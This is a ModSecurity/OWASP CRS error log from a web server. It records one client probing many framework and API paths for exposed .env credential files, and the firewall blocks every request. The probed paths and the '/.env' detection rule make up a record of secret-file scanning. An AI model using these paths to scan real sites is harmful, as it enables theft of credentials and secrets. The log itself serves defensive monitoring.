[Mon May 11 17:36:07.619348 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/codeigniter/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNmAAAAIE"]
[Mon May 11 17:36:07.619581 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/codeigniter/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNmAAAAIE"]
[Mon May 11 17:36:07.619818 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/codeigniter/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNmAAAAIE"]
[Mon May 11 17:36:07.928944 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cakephp/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNmQAAAIE"]
[Mon May 11 17:36:07.929191 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cakephp/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNmQAAAIE"]
[Mon May 11 17:36:07.929423 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cakephp/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNmQAAAIE"]
[Mon May 11 17:36:08.120068 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/zend/.env"] [unique_id "agH3aPy_GXSWIKeli0sNmgAAAIE"]
[Mon May 11 17:36:08.120323 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/zend/.env"] [unique_id "agH3aPy_GXSWIKeli0sNmgAAAIE"]
[Mon May 11 17:36:08.120586 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/zend/.env"] [unique_id "agH3aPy_GXSWIKeli0sNmgAAAIE"]
[Mon May 11 17:36:08.315573 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/yii/.env"] [unique_id "agH3aPy_GXSWIKeli0sNmwAAAIE"]
[Mon May 11 17:36:08.315797 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/yii/.env"] [unique_id "agH3aPy_GXSWIKeli0sNmwAAAIE"]
[Mon May 11 17:36:08.316028 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/yii/.env"] [unique_id "agH3aPy_GXSWIKeli0sNmwAAAIE"]
[Mon May 11 17:36:08.539369 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/laravel5/.env"] [unique_id "agH3aPy_GXSWIKeli0sNnAAAAIE"]
[Mon May 11 17:36:08.539607 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/laravel5/.env"] [unique_id "agH3aPy_GXSWIKeli0sNnAAAAIE"]
[Mon May 11 17:36:08.539844 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/laravel5/.env"] [unique_id "agH3aPy_GXSWIKeli0sNnAAAAIE"]
[Mon May 11 17:36:09.003019 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/v1/.env"] [unique_id "agH3afy_GXSWIKeli0sNnQAAAIE"]
[Mon May 11 17:36:09.003268 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/v1/.env"] [unique_id "agH3afy_GXSWIKeli0sNnQAAAIE"]
[Mon May 11 17:36:09.003519 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/v1/.env"] [unique_id "agH3afy_GXSWIKeli0sNnQAAAIE"]
[Mon May 11 17:36:09.182469 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/v2/.env"] [unique_id "agH3afy_GXSWIKeli0sNngAAAIE"]
[Mon May 11 17:36:09.182704 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/v2/.env"] [unique_id "agH3afy_GXSWIKeli0sNngAAAIE"]
[Mon May 11 17:36:09.183030 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/v2/.env"] [unique_id "agH3afy_GXSWIKeli0sNngAAAIE"]
[Mon May 11 17:36:09.523210 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/v3/.env"] [unique_id "agH3afy_GXSWIKeli0sNoAAAAIE"]
[Mon May 11 17:36:09.523444 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/v3/.env"] [unique_id "agH3afy_GXSWIKeli0sNoAAAAIE"]
[Mon May 11 17:36:09.523674 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/v3/.env"] [unique_id "agH3afy_GXSWIKeli0sNoAAAAIE"]
[Mon May 11 17:36:09.692784 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/v1/.env"] [unique_id "agH3afy_GXSWIKeli0sNoQAAAIE"]
[Mon May 11 17:36:09.693026 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/v1/.env"] [unique_id "agH3afy_GXSWIKeli0sNoQAAAIE"]
[Mon May 11 17:36:09.693288 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/v1/.env"] [unique_id "agH3afy_GXSWIKeli0sNoQAAAIE"]
[Mon May 11 17:36:09.921487 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/v2/.env"] [unique_id "agH3afy_GXSWIKeli0sNogAAAIE"]
[Mon May 11 17:36:09.921719 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/v2/.env"] [unique_id "agH3afy_GXSWIKeli0sNogAAAIE"]
[Mon May 11 17:36:09.921981 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/v2/.env"] [unique_id "agH3afy_GXSWIKeli0sNogAAAIE"]
[Mon May 11 17:36:10.172568 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/rest/.env"] [unique_id "agH3avy_GXSWIKeli0sNowAAAIE"]
[Mon May 11 17:36:10.172793 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/rest/.env"] [unique_id "agH3avy_GXSWIKeli0sNowAAAIE"]
[Mon May 11 17:36:10.173015 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/rest/.env"] [unique_id "agH3avy_GXSWIKeli0sNowAAAIE"]
[Mon May 11 17:36:10.703586 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/graphql/.env"] [unique_id "agH3avy_GXSWIKeli0sNpAAAAIE"]
[Mon May 11 17:36:10.703828 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/graphql/.env"] [unique_id "agH3avy_GXSWIKeli0sNpAAAAIE"]
[Mon May 11 17:36:10.704086 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/graphql/.env"] [unique_id "agH3avy_GXSWIKeli0sNpAAAAIE"]
[Mon May 11 17:36:10.930608 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/gateway/.env"] [unique_id "agH3avy_GXSWIKeli0sNpQAAAIE"]
[Mon May 11 17:36:10.930876 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/gateway/.env"] [unique_id "agH3avy_GXSWIKeli0sNpQAAAIE"]
[Mon May 11 17:36:10.931144 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/gateway/.env"] [unique_id "agH3avy_GXSWIKeli0sNpQAAAIE"]
[Mon May 11 17:36:11.104534 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/microservice/.env"] [unique_id "agH3a_y_GXSWIKeli0sNpwAAAIE"]
